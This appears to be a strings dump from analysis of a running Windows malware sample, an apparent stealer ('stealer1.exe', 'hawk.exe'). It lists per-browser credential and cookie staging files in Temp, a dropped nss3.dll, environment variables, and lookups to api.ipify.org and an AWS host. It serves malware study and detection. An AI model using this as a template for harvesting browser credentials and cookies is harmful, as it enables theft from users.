  926. 0x38d5c8 (84): C:\Users\A\AppData\Local\Temp\MSVCP140.dll
  927. 0x38d61e (24): MSVCP140.dll
  928. 0x38d638 (26): \MSVCP140.dll
  929. 0x38d978 (62): Microsoft SSL Protocol Provider
  930. 0x38de0e (6): H+HU 9
  931. 0x38df26 (19): Greater Manchester1
  932. 0x38df43 (8): Salford1
  933. 0x38df55 (21): COMODO CA Limited1604
  934. 0x38df70 (47): -COMODO RSA Domain Validation Secure Server CA0
  935. 0x38dfa1 (14):
  936. 180124000000Z
  937. 0x38dfb0 (19):
  938. 210123235959Z0X1!0
  939. 0x38dfcb (25): Domain Control Validated1
  940. 0x38dfee (21): PositiveSSL Wildcard1
  941. 0x38e00d (12): *.ipify.org0
  942. 0x38e1ed (30): https://secure.comodo.com/CPS0
  943. 0x38e226 (69): Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
  944. 0x38e288 (70): Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
  945. 0x38e2da (26): http://ocsp.comodoca.com0!
  946. 0x38e2ff (11): *.ipify.org
  947. 0x38e30b (12): ipify.org0
  948.  
  949. 0x38e476 (19): Greater Manchester1
  950. 0x38e493 (8): Salford1
  951. 0x38e4a5 (21): COMODO CA Limited1+0)
  952. 0x38e4c0 (36): "COMODO RSA Certification Authority0
  953. 0x38e4e6 (14):
  954. 140212000000Z
  955. 0x38e4f5 (15):
  956. 290211235959Z0
  957. 0x38e51e (19): Greater Manchester1
  958. 0x38e53b (8): Salford1
  959. 0x38e54d (21): COMODO CA Limited1604
  960. 0x38e568 (47): -COMODO RSA Domain Validation Secure Server CA0
  961. 0x38e776 (62): ;http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
  962. 0x38e7cf (50): /http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
  963. 0x38e80d (26): http://ocsp.comodoca.com0
  964.  
  965. 0x38e8ca (6): f5s2`N
  966. 0x390b4c (32): tem32\bcrypt.dll
  967. 0x390ff0 (40): bcryptprimitives.dll
  968. 0x391028 (62): Microsoft SSL Protocol Provider
  969. 0x391120 (26): PROCESSOR_ARCHITECTURE=x86
  970. 0x391168 (21): SystemRoot=C:\Windows
  971. 0x391288 (23): PROCESSOR_REVISION=9e09
  972. 0x3912f8 (62): C:\Windows\system32\dbghelp.dll
  973. 0x391558 (22): PUBLIC=C:\Users\Public
  974. 0x3915a0 (26): ProgramData=C:\ProgramData
  975. 0x3915e8 (23): windows_tracing_flags=3
  976. 0x391630 (22): USERPROFILE=C:\Users\A
  977. 0x391870 (22): NUMBER_OF_PROCESSORS=4
  978. 0x394083 (6): +][!>G
  979. 0x3942ba (7): L#K~Dl
  980.  
  981. 0x3970a8 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
  982. 0x3972c0 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
  983. 0x3974d8 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
  984. 0x3976d6 (368): 6rogram Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
  985. 0x3978b0 (112): C:\Users\A\AppData\Local\Google\Chrome\USERDA~1\Default\
  986. 0x3ce298 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
  987. 0x3ce2f0 (36): MpConfig_ProductCodeName=AntiSpyware
  988. 0x3ce348 (40): ProgramFiles(x86)=C:\Program Files (x86)
  989. 0x3ce3a0 (38): C:\Users\A\AppData\Local\Temp\nss3.dll
  990. 0x3ce3d8 (76): C:\Users\A\AppData\Local\Temp\nss3.dll
  991. 0x3ce430 (76): C:\Users\A\AppData\Local\Temp\nss3.dll
  992. 0x3cfa80 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
  993. 0x3cfd18 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  994. 0x3cfd90 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  995. 0x3cfe08 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  996. 0x3d0d00 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
  997. 0x3d0f18 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  998. 0x3d13e8 (6): zxGj`P
  999. 0x3d17d0 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
  1000. 0x3d19e8 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
  1001. 0x3d1c00 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
  1002. 0x3d1e18 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
  1003. 0x3d2030 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
  1004. 0x3d2248 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
  1005. 0x3d3b08 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
  1006. 0x3d4550 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
  1007. 0x3d4778 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
  1008. 0x3d49a0 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
  1009. 0x3d4bc8 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
  1010. 0x3d4df0 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
  1011. 0x3d5018 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
  1012. 0x3d5240 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
  1013. 0x3d5468 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
  1014. 0x3d5690 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
  1015. 0x3d58b8 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
  1016. 0x3d5ae0 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
  1017. 0x3d5d08 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
  1018. 0x3d5f30 (39): C:\Users\A\AppData\Local\Temp\Opera.txt
  1019. 0x3d6158 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
  1020. 0x3d6380 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
  1021. 0x3d65a8 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
  1022. 0x3d67d0 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
  1023. 0x3d69f8 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
  1024. 0x3d6c20 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
  1025. 0x3d6e48 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
  1026. 0x3d7070 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
  1027. 0x3d7298 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
  1028. 0x3d74c0 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
  1029. 0x3d76e8 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
  1030. 0x3d7910 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
  1031. 0x3d7b38 (42): C:\Users\A\AppData\Local\Temp\Maxthon5.txt
  1032. 0x3d7d60 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
  1033. 0x3d7f88 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
  1034. 0x3d81b0 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
  1035. 0x3d8550 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
  1036. 0x3d8778 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
  1037. 0x3d89a0 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
  1038. 0x3d8bc8 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
  1039. 0x3d8df0 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
  1040. 0x3d9018 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
  1041. 0x3d9240 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
  1042. 0x3d9468 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
  1043. 0x3d9690 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
  1044. 0x3d98b8 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
  1045. 0x3d9ae0 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
  1046. 0x3d9d08 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
  1047. 0x3d9f30 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
  1048. 0x3da158 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
  1049. 0x3da380 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
  1050. 0x3da5a8 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
  1051. 0x3da7d0 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
  1052. 0x3da9f8 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
  1053. 0x3dac20 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
  1054. 0x3dae48 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
  1055. 0x3db070 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
  1056. 0x3db298 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
  1057. 0x3db4c0 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
  1058. 0x3db6e8 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
  1059. 0x3db910 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
  1060. 0x3dbb38 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
  1061. 0x3dbd60 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
  1062. 0x3dbf88 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
  1063. 0x3dc1b0 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
  1064. 0x3dc550 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
  1065. 0x3dc778 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
  1066. 0x3dc9a0 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
  1067. 0x3dcbc8 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
  1068. 0x3dcdf0 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
  1069. 0x3dd018 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
  1070. 0x3dd240 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
  1071. 0x3dd468 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
  1072. 0x3dd690 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
  1073. 0x3dd8b8 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
  1074. 0x3ddae0 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
  1075. 0x3ddd08 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
  1076. 0x3ddf30 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
  1077. 0x3de158 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
  1078. 0x3de380 (47): C:\Users\A\AppData\Local\Temp\Opera_Cookies.txt
  1079. 0x3de5a8 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
  1080. 0x3de7d0 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
  1081. 0x3de9f8 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
  1082. 0x3dec20 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
  1083. 0x3dee48 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
  1084. 0x3df070 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
  1085. 0x3df298 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
  1086. 0x3df4c0 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
  1087. 0x3df6e8 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
  1088. 0x3df910 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
  1089. 0x3dfb38 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
  1090. 0x3dfd60 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
  1091. 0x3dff88 (50): C:\Users\A\AppData\Local\Temp\Maxthon5_Cookies.txt
  1092. 0x3e01b0 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
  1093. 0x3e051e (82): 8C:\Users\A\AppData\Local\Temp\result.txt
  1094. 0x3e0572 (16): hawk.exe
  1095. 0x460e80 (30): ALLUSERSPROFILE=C:\ProgramData
  1096. 0x460e9f (34): APPDATA=C:\Users\A\AppData\Roaming
  1097. 0x460ec2 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
  1098. 0x460f08 (44): les(x86)=C:\Program Files (x86)\Common Files
  1099. 0x460f35 (48): CommonProgramW6432=C:\Program Files\Common Files
  1100. 0x460f66 (14): COMPUTERNAME=O
  1101. 0x460f75 (11): ComSpec=C:\
  1102. 0x460f99 (19): FP_NO_HOST_CHECK=NO
  1103. 0x460fad (12): HOMEDRIVE=C:
  1104. 0x460fba (17): HOMEPATH=\Users\A
  1105. 0x460fcc (37): LOCALAPPDATA=C:\Users\A\AppData\Local
  1106. 0x460ff2 (15): LOGONSERVER=\\O
  1107. 0x461002 (6): MpConf
  1108. 0x461018 (47): aPath=C:\ProgramData\Microsoft\Windows Defender
  1109. 0x461048 (36): MpConfig_ProductCodeName=AntiSpyware
  1110. 0x46106d (35): MpConfig_ProductPath=C:\Program Fil
  1111. 0x461107 (17): vngGUID=8C765C2A-
  1112. 0x461128 (11): 2E8D7028CEB
  1113. 0x461134 (22): NUMBER_OF_PROCESSORS=4
  1114. 0x46114b (13): OS=Windows_NT
  1115. 0x461159 (71): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Window
  1116. 0x4611b0 (74): ndows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  1117. 0x4611fb (45): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JS
  1118. 0x461239 (26): PROCESSOR_ARCHITECTURE=x86
  1119. 0x461254 (28): PROCESSOR_ARCHITEW6432=AMD64
  1120. 0x461271 (63): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, Gen
  1121. 0x46134c (29): ProgramW6432=C:\Program Files
  1122. 0x46136a (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  1123. 0x4613ab (13): PUBLIC=C:\Use
  1124. 0x4613c8 (13): NNAME=Console
  1125. 0x4613d6 (14): SystemDrive=C:
  1126. 0x4613e5 (21): SystemRoot=C:\Windows
  1127. 0x4613fb (34): TEMP=C:\Users\A\AppData\Local\Temp
  1128. 0x46141e (33): TMP=C:\Users\A\AppData\Local\Temp
  1129. 0x461450 (7): RNAME=A
  1130. 0x461458 (22): USERPROFILE=C:\Users\A
  1131. 0x46146f (17): windir=C:\Windows
  1132. 0x461481 (23): windows_tracing_flags=3
  1133. 0x461499 (47): windows_tracing_logfile=C:\BVTBin\Tests\install
  1134. 0x4614d8 (6): le.log
  1135. 0x461566 (26):
  1136. 0x4615e4 (24):
  1137. 0x4615fd (8):
  1138. 0x461646 (26): abcdefghijklmnopqrstuvwxyz
  1139. 0x461666 (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
  1140. 0x4617c0 (30): ALLUSERSPROFILE=C:\ProgramData
  1141. 0x4617df (34): APPDATA=C:\Users\A\AppData\Roaming
  1142. 0x461802 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
  1143. 0x461839 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  1144. 0x461875 (48): CommonProgramW6432=C:\Program Files\Common Files
  1145. 0x4618a6 (14): COMPUTERNAME=O
  1146. 0x4618b5 (35): ComSpec=C:\Windows\system32\cmd.exe
  1147. 0x4618d9 (19): FP_NO_HOST_CHECK=NO
  1148. 0x4618ed (12): HOMEDRIVE=C:
  1149. 0x4618fa (17): HOMEPATH=\Users\A
  1150. 0x46190c (37): LOCALAPPDATA=C:\Users\A\AppData\Local
  1151. 0x461932 (15): LOGONSERVER=\\O
  1152. 0x461942 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  1153. 0x461988 (36): MpConfig_ProductCodeName=AntiSpyware
  1154. 0x4619ad (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
  1155. 0x4619e4 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  1156. 0x461a38 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  1157. 0x461a74 (22): NUMBER_OF_PROCESSORS=4
  1158. 0x461a8b (13): OS=Windows_NT
  1159. 0x461a99 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  1160. 0x461b3b (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  1161. 0x461b79 (26): PROCESSOR_ARCHITECTURE=x86
  1162. 0x461b94 (28): PROCESSOR_ARCHITEW6432=AMD64
  1163. 0x461bb1 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  1164. 0x461bfa (17): PROCESSOR_LEVEL=6
  1165. 0x461c0c (23): PROCESSOR_REVISION=9e09
  1166. 0x461c24 (26): ProgramData=C:\ProgramData
  1167. 0x461c3f (35): ProgramFiles=C:\Program Files (x86)
  1168. 0x461c63 (40): ProgramFiles(x86)=C:\Program Files (x86)
  1169. 0x461c8c (29): ProgramW6432=C:\Program Files
  1170. 0x461caa (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  1171. 0x461ceb (22): PUBLIC=C:\Users\Public
  1172. 0x461d02 (19): SESSIONNAME=Console
  1173. 0x461d16 (14): SystemDrive=C:
  1174. 0x461d25 (21): SystemRoot=C:\Windows
  1175. 0x461d3b (34): TEMP=C:\Users\A\AppData\Local\Temp
  1176. 0x461d5e (33): TMP=C:\Users\A\AppData\Local\Temp
  1177. 0x461d80 (12): USERDOMAIN=O
  1178. 0x461d8d (10): USERNAME=A
  1179. 0x461d98 (22): USERPROFILE=C:\Users\A
  1180. 0x461daf (17): windir=C:\Windows
  1181. 0x461dc1 (23): windows_tracing_flags=3
  1182. 0x461dd9 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  1183. 0x461eb1 (15): )%w )%w@)%w`)%w
  1184. 0x461ed1 (15): *%w *%w@*%w`*%w
  1185. 0x461ef1 (15): +%w +%w@+%w`+%w
  1186. 0x8b09f8 (30): ALLUSERSPROFILE=C:\ProgramData
  1187. 0x8b0a17 (34): APPDATA=C:\Users\A\AppData\Roaming
  1188. 0x8b0a3a (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
  1189. 0x8b0a71 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  1190. 0x8b0aad (48): CommonProgramW6432=C:\Program Files\Common Files
  1191. 0x8b0ade (14): COMPUTERNAME=O
  1192. 0x8b0aed (35): ComSpec=C:\Windows\system32\cmd.exe
  1193. 0x8b0b11 (19): FP_NO_HOST_CHECK=NO
  1194. 0x8b0b25 (12): HOMEDRIVE=C:
  1195. 0x8b0b32 (17): HOMEPATH=\Users\A
  1196. 0x8b0b44 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
  1197. 0x8b0b6a (15): LOGONSERVER=\\O
  1198. 0x8b0b7a (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  1199. 0x8b0bc0 (36): MpConfig_ProductCodeName=AntiSpyware
  1200. 0x8b0be5 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
  1201. 0x8b0c1c (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  1202. 0x8b0c70 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  1203. 0x8b0cac (22): NUMBER_OF_PROCESSORS=4
  1204. 0x8b0cc3 (13): OS=Windows_NT
  1205. 0x8b0cd1 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  1206. 0x8b0d73 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  1207. 0x8b0db1 (26): PROCESSOR_ARCHITECTURE=x86
  1208. 0x8b0dcc (28): PROCESSOR_ARCHITEW6432=AMD64
  1209. 0x8b0de9 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  1210. 0x8b0e32 (17): PROCESSOR_LEVEL=6
  1211. 0x8b0e44 (23): PROCESSOR_REVISION=9e09
  1212. 0x8b0e5c (26): ProgramData=C:\ProgramData
  1213. 0x8b0e77 (35): ProgramFiles=C:\Program Files (x86)
  1214. 0x8b0e9b (40): ProgramFiles(x86)=C:\Program Files (x86)
  1215. 0x8b0ec4 (29): ProgramW6432=C:\Program Files
  1216. 0x8b0ee2 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  1217. 0x8b0f23 (22): PUBLIC=C:\Users\Public
  1218. 0x8b0f3a (19): SESSIONNAME=Console
  1219. 0x8b0f4e (14): SystemDrive=C:
  1220. 0x8b0f5d (21): SystemRoot=C:\Windows
  1221. 0x8b0f73 (34): TEMP=C:\Users\A\AppData\Local\Temp
  1222. 0x8b0f96 (33): TMP=C:\Users\A\AppData\Local\Temp
  1223. 0x8b0fb8 (12): USERDOMAIN=O
  1224. 0x8b0fc5 (10): USERNAME=A
  1225. 0x8b0fd0 (22): USERPROFILE=C:\Users\A
  1226. 0x8b0fe7 (17): windir=C:\Windows
  1227. 0x8b0ff9 (23): windows_tracing_flags=3
  1228. 0x8b1011 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  1229. 0x8b1566 (26):
  1230. 0x8b15e4 (24):
  1231. 0x8b15fd (8):
  1232. 0x8b1646 (26): abcdefghijklmnopqrstuvwxyz
  1233. 0x8b1666 (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
  1234. 0x8b1718 (31): C:\Users\A\Desktop\stealer1.exe
  1235. 0x8b1850 (30): ALLUSERSPROFILE=C:\ProgramData
  1236. 0x8b186f (34): APPDATA=C:\Users\A\AppData\Roaming
  1237. 0x8b1892 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
  1238. 0x8b18c9 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
  1239. 0x8b1905 (48): CommonProgramW6432=C:\Program Files\Common Files
  1240. 0x8b1936 (14): COMPUTERNAME=O
  1241. 0x8b1945 (35): ComSpec=C:\Windows\system32\cmd.exe
  1242. 0x8b1969 (19): FP_NO_HOST_CHECK=NO
  1243. 0x8b197d (12): HOMEDRIVE=C:
  1244. 0x8b198a (17): HOMEPATH=\Users\A
  1245. 0x8b199c (37): LOCALAPPDATA=C:\Users\A\AppData\Local
  1246. 0x8b19c2 (15): LOGONSERVER=\\O
  1247. 0x8b19d2 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
  1248. 0x8b1a18 (36): MpConfig_ProductCodeName=AntiSpyware
  1249. 0x8b1a3d (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
  1250. 0x8b1a74 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
  1251. 0x8b1ac8 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
  1252. 0x8b1b04 (22): NUMBER_OF_PROCESSORS=4
  1253. 0x8b1b1b (13): OS=Windows_NT
  1254. 0x8b1b29 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
  1255. 0x8b1bcb (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  1256. 0x8b1c09 (26): PROCESSOR_ARCHITECTURE=x86
  1257. 0x8b1c24 (28): PROCESSOR_ARCHITEW6432=AMD64
  1258. 0x8b1c41 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
  1259. 0x8b1c8a (17): PROCESSOR_LEVEL=6
  1260. 0x8b1c9c (23): PROCESSOR_REVISION=9e09
  1261. 0x8b1cb4 (26): ProgramData=C:\ProgramData
  1262. 0x8b1ccf (35): ProgramFiles=C:\Program Files (x86)
  1263. 0x8b1cf3 (40): ProgramFiles(x86)=C:\Program Files (x86)
  1264. 0x8b1d1c (29): ProgramW6432=C:\Program Files
  1265. 0x8b1d3a (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
  1266. 0x8b1d7b (22): PUBLIC=C:\Users\Public
  1267. 0x8b1d92 (19): SESSIONNAME=Console
  1268. 0x8b1da6 (14): SystemDrive=C:
  1269. 0x8b1db5 (21): SystemRoot=C:\Windows
  1270. 0x8b1dcb (34): TEMP=C:\Users\A\AppData\Local\Temp
  1271. 0x8b1dee (33): TMP=C:\Users\A\AppData\Local\Temp
  1272. 0x8b1e10 (12): USERDOMAIN=O
  1273. 0x8b1e1d (10): USERNAME=A
  1274. 0x8b1e28 (22): USERPROFILE=C:\Users\A
  1275. 0x8b1e3f (17): windir=C:\Windows
  1276. 0x8b1e51 (23): windows_tracing_flags=3
  1277. 0x8b1e69 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
  1278. 0x8b1eb9 (15): e,t0e,tPe,tpe,t
  1279. 0x8b1ed9 (15): f,t0f,tPf,tpf,t
  1280. 0x8b1ef9 (15): g,t0g,tPg,tpg,t
  1281. 0x9008c0 (64): C:\Windows\System32\fwpuclnt.dll
  1282. 0x900998 (84): @%SystemRoot%\System32\wshtcpip.dll,-60100
  1283. 0x900b9c (66): %SystemRoot%\system32\mswsock.dll
  1284. 0x900e38 (84): @%SystemRoot%\System32\wshtcpip.dll,-60101
  1285. 0x90103c (66): %SystemRoot%\system32\mswsock.dll
  1286. 0x9012d8 (84): @%SystemRoot%\System32\wshtcpip.dll,-60102
  1287. 0x9014dc (66): %SystemRoot%\system32\mswsock.dll
  1288. 0x901778 (80): @%SystemRoot%\System32\wship6.dll,-60100
  1289. 0x90197c (66): %SystemRoot%\system32\mswsock.dll
  1290. 0x901c18 (80): @%SystemRoot%\System32\wship6.dll,-60101
  1291. 0x901e1c (66): %SystemRoot%\system32\mswsock.dll
  1292. 0x9020b8 (80): @%SystemRoot%\System32\wship6.dll,-60102
  1293. 0x9022bc (66): %SystemRoot%\system32\mswsock.dll
  1294. 0x902558 (76): @%SystemRoot%\System32\wshqos.dll,-100
  1295. 0x90275c (66): %SystemRoot%\system32\mswsock.dll
  1296. 0x9029f8 (76): @%SystemRoot%\System32\wshqos.dll,-101
  1297. 0x902bfc (66): %SystemRoot%\system32\mswsock.dll
  1298. 0x902e98 (76): @%SystemRoot%\System32\wshqos.dll,-102
  1299. 0x90309c (66): %SystemRoot%\system32\mswsock.dll
  1300. 0x903338 (76): @%SystemRoot%\System32\wshqos.dll,-103
  1301. 0x90353c (66): %SystemRoot%\system32\mswsock.dll
  1302. 0x903788 (64): %SystemRoot%\system32\NLAapi.dll
  1303. 0x9038c8 (76): @%SystemRoot%\System32\wshqos.dll,-103
  1304. 0x9039a0 (78): @%SystemRoot%\system32\nlasvc.dll,-1000
  1305. 0x903a30 (66): %SystemRoot%\system32\napinsp.dll
  1306. 0x903c48 (80): @%SystemRoot%\system32\napinsp.dll,-1000
  1307. 0x903ce0 (66): %SystemRoot%\system32\pnrpnsp.dll
  1308. 0x903ef8 (80): @%SystemRoot%\system32\pnrpnsp.dll,-1000
  1309. 0x903fa0 (66): %SystemRoot%\system32\pnrpnsp.dll
  1310. 0x9041b8 (80): @%SystemRoot%\system32\pnrpnsp.dll,-1001
  1311. 0x904260 (66): %SystemRoot%\System32\mswsock.dll
  1312. 0x904478 (84): @%SystemRoot%\system32\wshtcpip.dll,-60103
  1313. 0x904520 (64): %SystemRoot%\System32\winrnr.dll
  1314. 0x904a98 (40): MSAFD Tcpip [TCP/IP]
  1315. 0x904b60 (94): elb097307-934924932.us-east-1.elb.amazonaws.com
  1316. 0x904bc8 (26): api.ipify.org
  1317. 0x904ca0 (40): MSAFD Tcpip [UDP/IP]
  1318. 0x904ea8 (40): MSAFD Tcpip [RAW/IP]
  1319. 0x9050b0 (44): MSAFD Tcpip [TCP/IPv6]
  1320. 0x9052b8 (44): MSAFD Tcpip [UDP/IPv6]
  1321. 0x9054c0 (44): MSAFD Tcpip [RAW/IPv6]
  1322. 0x9056c8 (54): RSVP TCPv6 Service Provider
  1323. 0x9058d0 (50): RSVP TCP Service Provider
  1324. 0x905ad8 (54): RSVP UDPv6 Service Provider
  1325. 0x905ce0 (50): RSVP UDP Service Provider
